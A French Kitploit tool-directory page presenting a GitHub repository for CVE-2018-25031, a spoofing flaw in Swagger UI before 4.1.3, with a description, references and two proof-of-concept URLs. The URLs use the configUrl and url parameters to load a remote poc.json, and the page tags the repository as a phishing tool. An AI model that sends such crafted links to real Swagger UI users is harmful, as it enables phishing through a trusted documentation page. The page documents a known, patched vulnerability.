Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-25031 — Fichiers .json et .yaml utilisés pour exploiter CVE-2018-25031 | Kitploit
Outils/GitHubGitHub/afine-com/cve-2018-25031
Outils de PhishingAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebSécurité des API
GitHubafine-com/cve-2018-25031

CVE-2018-25031

Fichiers .json et .yaml utilisés pour exploiter CVE-2018-25031

Voir le dépôt
211il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-25031

Description :

Swagger UI avant la version 4.1.3 pouvait permettre à un attaquant distant de mener des attaques par usurpation. En persuadant une victime d'ouvrir une URL conçue, un attaquant pourrait exploiter cette vulnérabilité pour afficher des définitions OpenAPI distantes.


Capture d'écran avant l'attaque :

PoC :

root@kitploit:~
/index.html?configUrl=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json
/index.html?url=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json

Capture d'écran PoC après l'attaque :

Références :

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://deps.dev/advisory/GHSA/GHSA-cr3q-pqgq-m8c2

Testé sur Swagger UI 3.52.1
Télécharger l’outil